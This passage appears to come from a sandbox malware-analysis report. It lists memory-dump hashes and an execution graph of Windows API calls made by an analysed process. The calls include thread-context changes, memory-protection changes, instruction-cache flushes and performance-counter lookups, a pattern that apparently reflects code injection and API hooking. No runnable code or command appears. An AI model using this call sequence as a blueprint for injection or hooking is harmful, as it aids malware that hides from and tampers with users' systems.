                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                              • Instruction ID: 5c5391555e7210d371c64fbc2eab03c564c34c986135a91487a3b85fd8c60fa5
                              • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                              • Instruction Fuzzy Hash: C7E06531611604EAEB559F92D80C34A3AE1FB88F19F49C014CD0D0B354DF7DC8E98740
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                              • Instruction ID: 30b20971677f4c2a0e55469442b0ca6c017d8c26b9eec68740c01632917addfa
                              • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                              • Instruction Fuzzy Hash: 4FE03931621604EAEB14ABA2D80834A3AE1EB8CB49F448024CD090B754EF7DC4E98750
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                              • Instruction ID: 04bf766fac7ba404a30eea39ef6d96916a1e6ee62b1332ae21a5d626d74c529c
                              • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                              • Instruction Fuzzy Hash: D0E0ED71621504EAEB59ABA2D80825A7AA1FB88B29F498024CD090B314EF3888E99610
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                              • Instruction ID: a17d3cafa6749d258315ce92676b667ecf698181379601acc7b8feff7c1023fe
                              • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                              • Instruction Fuzzy Hash: B5E0ED71621504EAEB18ABA2D90825A7AA1FB8CB59F448024CD090B714EE3884E99610

                              Execution Graph

                              Execution Coverage:1.5%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:0%
                              Total number of Nodes:1410
                              Total number of Limit Nodes:6
                              execution_graph 8811 2bcd7e3fe20 8812 2bcd7e3fe4a 8811->8812 8813 2bcd7e3d220 __std_exception_copy 13 API calls 8812->8813 8814 2bcd7e3fe6a 8813->8814 8815 2bcd7e3d2a0 __free_lconv_num 13 API calls 8814->8815 8816 2bcd7e3fe78 8815->8816 8818 2bcd7e3d220 __std_exception_copy 13 API calls 8816->8818 8820 2bcd7e3fea2 8816->8820 8817 2bcd7e3fec1 InitializeCriticalSectionEx 8817->8820 8819 2bcd7e3fe94 8818->8819 8821 2bcd7e3d2a0 __free_lconv_num 13 API calls 8819->8821 8820->8817 8822 2bcd7e3feab 8820->8822 8821->8820 8823 2bcd7e3f820 8826 2bcd7e3f7d8 8823->8826 8831 2bcd7e3c558 EnterCriticalSection 8826->8831 9159 2bcd7e4479d 9162 2bcd7e3af34 9159->9162 9163 2bcd7e3af4e 9162->9163 9165 2bcd7e3af9b 9162->9165 9164 2bcd7e39324 _CreateFrameInfo 9 API calls 9163->9164 9163->9165 9164->9165 7575 2bcd7e34320 7578 2bcd7e3426d 7575->7578 7576 2bcd7e342d7 7577 2bcd7e342bd VirtualQuery 7577->7576 7577->7578 7578->7576 7578->7577 7579 2bcd7e34322 GetLastError 7578->7579 7579->7578 8832 2bcd7e3c828 8833 2bcd7e3c82d 8832->8833 8834 2bcd7e3c842 8832->8834 8838 2bcd7e3c848 8833->8838 8839 2bcd7e3c88a 8838->8839 8840 2bcd7e3c892 8838->8840 8842 2bcd7e3d2a0 __free_lconv_num 13 API calls 8839->8842 8841 2bcd7e3d2a0 __free_lconv_num 13 API calls 8840->8841 8843 2bcd7e3c89f 8841->8843 8842->8840 8844 2bcd7e3d2a0 __free_lconv_num 13 API calls 8843->8844 8845 2bcd7e3c8ac 8844->8845 8846 2bcd7e3d2a0 __free_lconv_num 13 API calls 8845->8846 8847 2bcd7e3c8b9 8846->8847 8848 2bcd7e3d2a0 __free_lconv_num 13 API calls 8847->8848 8849 2bcd7e3c8c6 8848->8849 8850 2bcd7e3d2a0 __free_lconv_num 13 API calls 8849->8850 8851 2bcd7e3c8d3 8850->8851 8852 2bcd7e3d2a0 __free_lconv_num 13 API calls 8851->8852 8853 2bcd7e3c8e0 8852->8853 8854 2bcd7e3d2a0 __free_lconv_num 13 API calls 8853->8854 8855 2bcd7e3c8ed 8854->8855 8856 2bcd7e3d2a0 __free_lconv_num 13 API calls 8855->8856 8857 2bcd7e3c8fd 8856->8857 8858 2bcd7e3d2a0 __free_lconv_num 13 API calls 8857->8858 8859 2bcd7e3c90d 8858->8859 8864 2bcd7e3c6f8 8859->8864 8878 2bcd7e3c558 EnterCriticalSection 8864->8878 9166 2bcd7e40fa8 9167 2bcd7e40fcc 9166->9167 9168 2bcd7e38070 _invalid_parameter_noinfo 8 API calls 9167->9168 9169 2bcd7e4100e 9168->9169 9170 2bcd7e333a8 9171 2bcd7e333cf 9170->9171 9172 2bcd7e3349c 9171->9172 9173 2bcd7e333ec PdhGetCounterInfoW 9171->9173 9173->9172 9174 2bcd7e3340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 9173->9174 9175 2bcd7e33440 StrCmpW 9174->9175 9176 2bcd7e33488 GetProcessHeap HeapFree 9174->9176 9175->9176 9178 2bcd7e33455 9175->9178 9176->9172 9177 2bcd7e33950 12 API calls 9177->9178 9178->9176 9178->9177 8880 2bcd7e3ec30 GetCommandLineA GetCommandLineW 7580 2bcd7e3872c 7583 2bcd7e390c0 7580->7583 7582 2bcd7e38755 7584 2bcd7e39116 7583->7584 7585 2bcd7e390e1 7583->7585 7584->7582 7585->7584 7587 2bcd7e3c328 7585->7587 7588 2bcd7e3c335 7587->7588 7590 2bcd7e3c33f 7587->7590 7588->7590 7594 2bcd7e3c35a 7588->7594 7596 2bcd7e3d1f4 7590->7596 7591 2bcd7e3c346 7599 2bcd7e3d04c 7591->7599 7593 2bcd7e3c352 7593->7584 7594->7593 7595 2bcd7e3d1f4 __std_exception_copy 13 API calls 7594->7595 7595->7591 7602 2bcd7e3cb10 7596->7602 7670 2bcd7e3cef8 7599->7670 7603 2bcd7e3cb59 GetLastError 7602->7603 7604 2bcd7e3cb2f __std_exception_copy 7602->7604 7605 2bcd7e3cb6c 7603->7605 7607 2bcd7e3cb54 7604->7607 7611 2bcd7e3c940 GetLastError 7604->7611 7606 2bcd7e3cb8a SetLastError 7605->7606 7608 2bcd7e3cb87 7605->7608 7609 2bcd7e3c940 __std_exception_copy 11 API calls 7605->7609 7606->7607 7607->7591 7608->7606 7609->7608 7612 2bcd7e3c966 7611->7612 7613 2bcd7e3c96c SetLastError 7612->7613 7629 2bcd7e3d220 7612->7629 7614 2bcd7e3c9e5 7613->7614 7614->7607 7617 2bcd7e3c9a5 FlsSetValue 7620 2bcd7e3c9b1 FlsSetValue 7617->7620 7621 2bcd7e3c9c8 7617->7621 7618 2bcd7e3c995 FlsSetValue 7636 2bcd7e3d2a0 7618->7636 7623 2bcd7e3d2a0 __free_lconv_num 7 API calls 7620->7623 7642 2bcd7e3c758 7621->7642 7625 2bcd7e3c9c6 SetLastError 7623->7625 7625->7614 7634 2bcd7e3d231 __std_exception_copy 7629->7634 7630 2bcd7e3d282 7632 2bcd7e3d1f4 __std_exception_copy 12 API calls 7630->7632 7631 2bcd7e3d266 HeapAlloc 7633 2bcd7e3c987 7631->7633 7631->7634 7632->7633 7633->7617 7633->7618 7634->7630 7634->7631 7647 2bcd7e3b470 7634->7647 7637 2bcd7e3c9a3 7636->7637 7638 2bcd7e3d2a5 HeapFree 7636->7638 7637->7613 7638->7637 7639 2bcd7e3d2c0 GetLastError 7638->7639 7640 2bcd7e3d2cd __free_lconv_num 7639->7640 7641 2bcd7e3d1f4 __std_exception_copy 11 API calls 7640->7641 7641->7637 7656 2bcd7e3c630 7642->7656 7650 2bcd7e3b4c0 7647->7650 7655 2bcd7e3c558 EnterCriticalSection 7650->7655 7668 2bcd7e3c558 EnterCriticalSection 7656->7668 7671 2bcd7e3cf23 7670->7671 7678 2bcd7e3cf94 7671->7678 7673 2bcd7e3cf4a 7674 2bcd7e3cf6d 7673->7674 7688 2bcd7e3c3e0 7673->7688 7676 2bcd7e3cf82 7674->7676 7677 2bcd7e3c3e0 _invalid_parameter_noinfo 17 API calls 7674->7677 7676->7593 7677->7676 7701 2bcd7e3ccc8 7678->7701 7684 2bcd7e3cfcf 7684->7673 7689 2bcd7e3c3ef GetLastError 7688->7689 7690 2bcd7e3c438 7688->7690 7691 2bcd7e3c404 7689->7691 7690->7674 7692 2bcd7e3cba0 _invalid_parameter_noinfo 14 API calls 7691->7692 7693 2bcd7e3c41e SetLastError 7692->7693 7693->7690 7694 2bcd7e3c441 7693->7694 7695 2bcd7e3c3e0 _invalid_parameter_noinfo 15 API calls 7694->7695 7696 2bcd7e3c467 7695->7696 7741 2bcd7e3ffe8 7696->7741 7702 2bcd7e3cd1f 7701->7702 7703 2bcd7e3cce4 GetLastError 7701->7703 7702->7684 7707 2bcd7e3cd34 7702->7707 7704 2bcd7e3ccf4 7703->7704 7714 2bcd7e3cba0 7704->7714 7708 2bcd7e3cd50 GetLastError SetLastError 7707->7708 7709 2bcd7e3cd68 7707->7709 7708->7709 7709->7684 7710 2bcd7e3d06c IsProcessorFeaturePresent 7709->7710 7711 2bcd7e3d07f 7710->7711 7719 2bcd7e3cd80 7711->7719 7715 2bcd7e3cbc8 FlsGetValue 7714->7715 7717 2bcd7e3cbc4 7714->7717 7715->7717 7716 2bcd7e3cbde SetLastError 7716->7702 7717->7716 7718 2bcd7e3c940 __std_exception_copy 13 API calls 7717->7718 7718->7716 7720 2bcd7e3cdba _invalid_parameter_noinfo 7719->7720 7721 2bcd7e3cde2 RtlCaptureContext RtlLookupFunctionEntry 7720->7721 7722 2bcd7e3ce2e RtlVirtualUnwind 7721->7722 7723 2bcd7e3ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7721->7723 7722->7723 7724 2bcd7e3ceb6 _invalid_parameter_noinfo 7723->7724 7727 2bcd7e38070 7724->7727 7728 2bcd7e38079 7727->7728 7729 2bcd7e38084 GetCurrentProcess TerminateProcess 7728->7729 7730 2bcd7e38848 IsProcessorFeaturePresent 7728->7730 7731 2bcd7e38860 7730->7731 7736 2bcd7e3891c RtlCaptureContext 7731->7736 7737 2bcd7e38936 RtlLookupFunctionEntry 7736->7737 7738 2bcd7e3894c RtlVirtualUnwind 7737->7738 7739 2bcd7e38873 7737->7739 7738->7737 7738->7739 7740 2bcd7e38814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7739->7740 7742 2bcd7e40001 7741->7742 7743 2bcd7e3c48f 7741->7743 7742->7743 7749 2bcd7e40a40 7742->7749 7745 2bcd7e40054 7743->7745 7746 2bcd7e3c49f 7745->7746 7747 2bcd7e4006d 7745->7747 7746->7674 7747->7746 7767 2bcd7e3e8c4 7747->7767 7758 2bcd7e3cab0 7749->7758 7751 2bcd7e40a4f 7757 2bcd7e40a95 7751->7757 7766 2bcd7e3c558 EnterCriticalSection 7751->7766 7757->7743 7759 2bcd7e3cb10 __std_exception_copy 13 API calls 7758->7759 7761 2bcd7e3cab9 7759->7761 7760 2bcd7e3cabe 7760->7751 7761->7760 7762 2bcd7e3cae8 FlsGetValue 7761->7762 7764 2bcd7e3cae4 7761->7764 7762->7764 7763 2bcd7e3cafe 7763->7751 7764->7763 7765 2bcd7e3c940 __std_exception_copy 13 API calls 7764->7765 7765->7763 7768 2bcd7e3cab0 _invalid_parameter_noinfo 14 API calls 7767->7768 7769 2bcd7e3e8cd 7768->7769 8213 2bcd7e3aaac 8214 2bcd7e3aad9 __except_validate_context_record 8213->8214 8215 2bcd7e39324 _CreateFrameInfo 9 API calls 8214->8215 8216 2bcd7e3aade 8215->8216 8219 2bcd7e3ab38 8216->8219 8221 2bcd7e3abc6 8216->8221 8227 2bcd7e3ab8c 8216->8227 8217 2bcd7e3ac34 8217->8227 8255 2bcd7e3a22c 8217->8255 8218 2bcd7e3abb3 8242 2bcd7e395d0 8218->8242 8219->8218 8219->8227 8228 2bcd7e3ab5a __GetCurrentState 8219->8228 8224 2bcd7e3abe5 8221->8224 8249 2bcd7e399cc 8221->8249 8224->8217 8224->8227 8252 2bcd7e399e0 8224->8252 8225 2bcd7e3acdd 8228->8225 8230 2bcd7e3afb8 8228->8230 8231 2bcd7e399cc Is_bad_exception_allowed 9 API calls 8230->8231 8232 2bcd7e3afe7 __GetCurrentState 8231->8232 8233 2bcd7e39324 _CreateFrameInfo 9 API calls 8232->8233 8238 2bcd7e3b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8233->8238 8234 2bcd7e3b0fb 8235 2bcd7e39324 _CreateFrameInfo 9 API calls 8234->8235 8236 2bcd7e3b100 8235->8236 8237 2bcd7e39324 _CreateFrameInfo 9 API calls 8236->8237 8239 2bcd7e3b10b __FrameHandler3::GetHandlerSearchState 8236->8239 8237->8239 8238->8234 8238->8239 8240 2bcd7e399cc 9 API calls Is_bad_exception_allowed 8238->8240 8241 2bcd7e399f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8238->8241 8239->8227 8240->8238 8241->8238 8312 2bcd7e39634 8242->8312 8244 2bcd7e395ef __FrameHandler3::FrameUnwindToEmptyState 8316 2bcd7e39540 8244->8316 8247 2bcd7e3afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8248 2bcd7e39624 8247->8248 8248->8227 8250 2bcd7e39324 _CreateFrameInfo 9 API calls 8249->8250 8251 2bcd7e399d5 8250->8251 8251->8224 8253 2bcd7e39324 _CreateFrameInfo 9 API calls 8252->8253 8254 2bcd7e399e9 8253->8254 8254->8217 8320 2bcd7e3b144 8255->8320 8257 2bcd7e3a6f4 8258 2bcd7e3a645 8258->8257 8298 2bcd7e3a643 8258->8298 8373 2bcd7e3a6fc 8258->8373 8259 2bcd7e3a373 8259->8258 8269 2bcd7e3a3ab 8259->8269 8261 2bcd7e39324 _CreateFrameInfo 9 API calls 8265 2bcd7e3a687 8261->8265 8262 2bcd7e3a575 8268 2bcd7e3a592 8262->8268 8272 2bcd7e399cc Is_bad_exception_allowed 9 API calls 8262->8272 8262->8298 8263 2bcd7e39324 _CreateFrameInfo 9 API calls 8266 2bcd7e3a2da 8263->8266 8265->8257 8267 2bcd7e38070 _invalid_parameter_noinfo 8 API calls 8265->8267 8266->8265 8270 2bcd7e39324 _CreateFrameInfo 9 API calls 8266->8270 8271 2bcd7e3a69a 8267->8271 8275 2bcd7e3a5b4 8268->8275 8268->8298 8366 2bcd7e395a4 8268->8366 8269->8262 8287 2bcd7e399e0 9 API calls 8269->8287 8345 2bcd7e3a96c 8269->8345 8359 2bcd7e3a158 8269->8359 8274 2bcd7e3a2ea 8270->8274 8271->8227 8272->8268 8276 2bcd7e39324 _CreateFrameInfo 9 API calls 8274->8276 8277 2bcd7e3a5ca 8275->8277 8275->8298 8309 2bcd7e3a6d7 8275->8309 8278 2bcd7e3a2f3 8276->8278 8279 2bcd7e3a5d5 8277->8279 8282 2bcd7e399cc Is_bad_exception_allowed 9 API calls 8277->8282 8331 2bcd7e39a0c 8278->8331 8286 2bcd7e3b1dc 9 API calls 8279->8286 8280 2bcd7e39324 _CreateFrameInfo 9 API calls 8283 2bcd7e3a6dd 8280->8283 8282->8279 8284 2bcd7e39324 _CreateFrameInfo 9 API calls 8283->8284 8288 2bcd7e3a6e6 8284->8288 8289 2bcd7e3a5eb 8286->8289 8287->8269 8291 2bcd7e3c2f4 14 API calls 8288->8291 8293 2bcd7e39634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 8289->8293 8289->8298 8290 2bcd7e39324 _CreateFrameInfo 9 API calls 8292 2bcd7e3a335 8290->8292 8291->8257 8292->8259 8295 2bcd7e39324 _CreateFrameInfo 9 API calls 8292->8295 8294 2bcd7e3a605 8293->8294 8370 2bcd7e39838 RtlUnwindEx 8294->8370 8297 2bcd7e3a341 8295->8297 8299 2bcd7e39324 _CreateFrameInfo 9 API calls 8297->8299 8298->8261 8300 2bcd7e3a34a 8299->8300 8334 2bcd7e3b1dc 8300->8334 8305 2bcd7e3a35e 8341 2bcd7e3b2cc 8305->8341 8307 2bcd7e3a6d1 8390 2bcd7e3c2f4 8307->8390 8309->8280 8310 2bcd7e3a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 8310->8307 8385 2bcd7e39178 8310->8385 8315 2bcd7e39662 __FrameHandler3::FrameUnwindToEmptyState 8312->8315 8313 2bcd7e396d4 8313->8244 8314 2bcd7e3968c RtlLookupFunctionEntry 8314->8315 8315->8313 8315->8314 8317 2bcd7e39560 8316->8317 8318 2bcd7e3958b 8316->8318 8317->8318 8319 2bcd7e39324 _CreateFrameInfo 9 API calls 8317->8319 8318->8247 8319->8317 8321 2bcd7e3b169 __FrameHandler3::FrameUnwindToEmptyState 8320->8321 8322 2bcd7e39634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 8321->8322 8323 2bcd7e3b17e 8322->8323 8393 2bcd7e39db4 8323->8393 8326 2bcd7e3b190 __FrameHandler3::GetHandlerSearchState 8396 2bcd7e39dec 8326->8396 8327 2bcd7e3b1b3 8328 2bcd7e39db4 __GetUnwindTryBlock RtlLookupFunctionEntry 8327->8328 8329 2bcd7e3a28e 8328->8329 8329->8257 8329->8259 8329->8263 8332 2bcd7e39324 _CreateFrameInfo 9 API calls 8331->8332 8333 2bcd7e39a1a 8332->8333 8333->8257 8333->8290 8336 2bcd7e3b2c3 8334->8336 8339 2bcd7e3b207 8334->8339 8335 2bcd7e3a35a 8335->8259 8335->8305 8337 2bcd7e399e0 9 API calls 8337->8339 8338 2bcd7e399cc Is_bad_exception_allowed 9 API calls 8338->8339 8339->8335 8339->8337 8339->8338 8340 2bcd7e3a96c 9 API calls 8339->8340 8340->8339 8342 2bcd7e3b339 8341->8342 8343 2bcd7e3b2e9 Is_bad_exception_allowed 8341->8343 8342->8310 8343->8342 8344 2bcd7e399cc 9 API calls Is_bad_exception_allowed 8343->8344 8344->8343 8346 2bcd7e3aa28 8345->8346 8347 2bcd7e3a999 8345->8347 8346->8269 8348 2bcd7e399cc Is_bad_exception_allowed 9 API calls 8347->8348 8349 2bcd7e3a9a2 8348->8349 8349->8346 8350 2bcd7e399cc Is_bad_exception_allowed 9 API calls 8349->8350 8351 2bcd7e3a9bb 8349->8351 8350->8351 8351->8346 8352 2bcd7e399cc Is_bad_exception_allowed 9 API calls 8351->8352 8353 2bcd7e3a9e7 8351->8353 8352->8353 8354 2bcd7e399e0 9 API calls 8353->8354 8355 2bcd7e3a9fb 8354->8355 8355->8346 8356 2bcd7e3aa14 8355->8356 8357 2bcd7e399cc Is_bad_exception_allowed 9 API calls 8355->8357 8358 2bcd7e399e0 9 API calls 8356->8358 8357->8356 8358->8346 8360 2bcd7e39634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 8359->8360 8361 2bcd7e3a195 8360->8361 8362 2bcd7e399cc Is_bad_exception_allowed 9 API calls 8361->8362 8363 2bcd7e3a1cd 8362->8363 8364 2bcd7e39838 9 API calls 8363->8364 8365 2bcd7e3a211 8364->8365 8365->8269 8367 2bcd7e395b8 __FrameHandler3::FrameUnwindToEmptyState 8366->8367 8368 2bcd7e39540 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8367->8368 8369 2bcd7e395c2 8368->8369 8369->8275 8371 2bcd7e38070 _invalid_parameter_noinfo 8 API calls 8370->8371 8372 2bcd7e39932 8371->8372 8372->8298 8374 2bcd7e3a735 8373->8374 8379 2bcd7e3a948 8373->8379 8375 2bcd7e39324 _CreateFrameInfo 9 API calls 8374->8375 8376 2bcd7e3a73a 8375->8376 8377 2bcd7e3a759 EncodePointer 8376->8377 8380 2bcd7e3a7ac 8376->8380 8378 2bcd7e39324 _CreateFrameInfo 9 API calls 8377->8378 8381 2bcd7e3a769 8378->8381 8379->8298 8380->8379 8383 2bcd7e399cc 9 API calls Is_bad_exception_allowed 8380->8383 8384 2bcd7e3a158 19 API calls 8380->8384 8381->8380 8399 2bcd7e394ec 8381->8399 8383->8380 8384->8380 8386 2bcd7e39197 8385->8386 8387 2bcd7e391e2 RaiseException 8386->8387 8388 2bcd7e391c0 RtlPcToFileHeader 8386->8388 8387->8307 8389 2bcd7e391d8 8388->8389 8389->8387 8391 2bcd7e3cab0 _invalid_parameter_noinfo 14 API calls 8390->8391 8392 2bcd7e3c2fd 8391->8392 8394 2bcd7e39634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 8393->8394 8395 2bcd7e39dc7 8394->8395 8395->8326 8395->8327 8397 2bcd7e39634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 8396->8397 8398 2bcd7e39e06 8397->8398 8398->8329 8400 2bcd7e39324 _CreateFrameInfo 9 API calls 8399->8400 8401 2bcd7e39518 8400->8401 8401->8380 8881 2bcd7e36430 8882 2bcd7e3643d 8881->8882 8883 2bcd7e36449 8882->8883 8888 2bcd7e3655a 8882->8888 8884 2bcd7e364cd 8883->8884 8885 2bcd7e364a6 SetThreadContext 8883->8885 8885->8884 8886 2bcd7e3663e 8889 2bcd7e3665e 8886->8889 8897 2bcd7e34b20 8886->8897 8887 2bcd7e36581 VirtualProtect FlushInstructionCache 8887->8888 8888->8886 8888->8887 8901 2bcd7e35530 GetCurrentProcess 8889->8901 8892 2bcd7e36677 ResumeThread 8893 2bcd7e36663 8892->8893 8893->8892 8894 2bcd7e366b7 8893->8894 8895 2bcd7e38070 _invalid_parameter_noinfo 8 API calls 8894->8895 8896 2bcd7e366ff 8895->8896 8899 2bcd7e34b3c 8897->8899 8898 2bcd7e34b9f 8898->8889 8899->8898 8900 2bcd7e34b52 VirtualFree 8899->8900 8900->8899 8902 2bcd7e3554c 8901->8902 8903 2bcd7e35593 8902->8903 8904 2bcd7e35562 VirtualProtect FlushInstructionCache 8902->8904 8903->8893 8904->8902 8402 2bcd7e32ab4 TlsGetValue TlsGetValue TlsGetValue 8403 2bcd7e32b0d 8402->8403 8406 2bcd7e32b79 8402->8406 8404 2bcd7e32b15 8403->8404 8403->8406 8405 2bcd7e32b74 8404->8405 8407 2bcd7e32c32 TlsSetValue TlsSetValue TlsSetValue 8404->8407 8410 2bcd7e33f88 8404->8410 8406->8405 8406->8407 8409 2bcd7e33f88 StrCmpNIW 8406->8409 8407->8405 8409->8406 8411 2bcd7e33faa 8410->8411 8412 2bcd7e33f95 StrCmpNIW 8410->8412 8411->8404 8412->8411 7770 2bcd7e3bd34 7771 2bcd7e3bd4d 7770->7771 7772 2bcd7e3bd49 7770->7772 7785 2bcd7e3e864 7771->7785 7777 2bcd7e3bd5f 7779 2bcd7e3d2a0 __free_lconv_num 13 API calls 7777->7779 7778 2bcd7e3bd6b 7811 2bcd7e3bda8 7778->7811 7779->7772 7782 2bcd7e3d2a0 __free_lconv_num 13 API calls 7783 2bcd7e3bd92 7782->7783 7784 2bcd7e3d2a0 __free_lconv_num 13 API calls 7783->7784 7784->7772 7786 2bcd7e3e871 7785->7786 7787 2bcd7e3bd52 7785->7787 7830 2bcd7e3cacc 7786->7830 7791 2bcd7e3edc8 GetEnvironmentStringsW 7787->7791 7789 2bcd7e3e8a0 7835 2bcd7e3e53c 7789->7835 7792 2bcd7e3bd57 7791->7792 7793 2bcd7e3edf8 7791->7793 7792->7777 7792->7778 7794 2bcd7e3ece8 WideCharToMultiByte 7793->7794 7795 2bcd7e3ee49 7794->7795 7796 2bcd7e3ee53 FreeEnvironmentStringsW 7795->7796 7797 2bcd7e3c5d0 14 API calls 7795->7797 7796->7792 7798 2bcd7e3ee63 7797->7798 7799 2bcd7e3ee6b 7798->7799 7800 2bcd7e3ee74 7798->7800 7801 2bcd7e3d2a0 __free_lconv_num 13 API calls 7799->7801 7802 2bcd7e3ece8 WideCharToMultiByte 7800->7802 7803 2bcd7e3ee72 7801->7803 7804 2bcd7e3ee97 7802->7804 7803->7796 7805 2bcd7e3ee9b 7804->7805 7806 2bcd7e3eea5 7804->7806 7807 2bcd7e3d2a0 __free_lconv_num 13 API calls 7805->7807 7808 2bcd7e3d2a0 __free_lconv_num 13 API calls 7806->7808 7809 2bcd7e3eea3 FreeEnvironmentStringsW 7807->7809 7808->7809 7809->7792 7812 2bcd7e3bdcd 7811->7812 7813 2bcd7e3d220 __std_exception_copy 13 API calls 7812->7813 7822 2bcd7e3be03 7813->7822 7814 2bcd7e3d2a0 __free_lconv_num 13 API calls 7816 2bcd7e3bd73 7814->7816 7815 2bcd7e3be6d 7817 2bcd7e3d2a0 __free_lconv_num 13 API calls 7815->7817 7816->7782 7817->7816 7818 2bcd7e3d220 __std_exception_copy 13 API calls 7818->7822 7819 2bcd7e3be92 8026 2bcd7e3bebc 7819->8026 7820 2bcd7e3c328 __std_exception_copy 38 API calls 7820->7822 7822->7815 7822->7818 7822->7819 7822->7820 7824 2bcd7e3bea6 7822->7824 7827 2bcd7e3d2a0 __free_lconv_num 13 API calls 7822->7827 7828 2bcd7e3be0b 7822->7828 7826 2bcd7e3d06c _invalid_parameter_noinfo 17 API calls 7824->7826 7825 2bcd7e3d2a0 __free_lconv_num 13 API calls 7825->7828 7829 2bcd7e3beb9 7826->7829 7827->7822 7828->7814 7831 2bcd7e3cae8 FlsGetValue 7830->7831 7832 2bcd7e3cae4 7830->7832 7831->7832 7833 2bcd7e3c940 __std_exception_copy 13 API calls 7832->7833 7834 2bcd7e3cafe 7832->7834 7833->7834 7834->7789 7858 2bcd7e3e7ac 7835->7858 7840 2bcd7e3e58e 7840->7787 7843 2bcd7e3e5a7 7844 2bcd7e3d2a0 __free_lconv_num 13 API calls 7843->7844 7844->7840 7845 2bcd7e3e5b6 7845->7845 7884 2bcd7e3e8e0 7845->7884 7848 2bcd7e3e6b2 7849 2bcd7e3d1f4 __std_exception_copy 13 API calls 7848->7849 7850 2bcd7e3e6b7 7849->7850 7852 2bcd7e3d2a0 __free_lconv_num 13 API calls 7850->7852 7851 2bcd7e3e70d 7857 2bcd7e3e774 7851->7857 7895 2bcd7e3e05c 7851->7895 7852->7840 7853 2bcd7e3e6cc 7853->7851 7855 2bcd7e3d2a0 __free_lconv_num 13 API calls 7853->7855 7854 2bcd7e3d2a0 __free_lconv_num 13 API calls 7854->7840 7855->7851 7857->7854 7859 2bcd7e3e7cf 7858->7859 7864 2bcd7e3e7d9 7859->7864 7910 2bcd7e3c558 EnterCriticalSection 7859->7910 7865 2bcd7e3e571 7864->7865 7867 2bcd7e3cacc 14 API calls 7864->7867 7870 2bcd7e3e22c 7865->7870 7868 2bcd7e3e8a0 7867->7868 7869 2bcd7e3e53c 56 API calls 7868->7869 7869->7865 7911 2bcd7e3dd78 7870->7911 7873 2bcd7e3e24c GetOEMCP 7876 2bcd7e3e273 7873->7876 7874 2bcd7e3e25e 7875 2bcd7e3e263 GetACP 7874->7875 7874->7876 7875->7876 7876->7840 7877 2bcd7e3c5d0 7876->7877 7878 2bcd7e3c61b 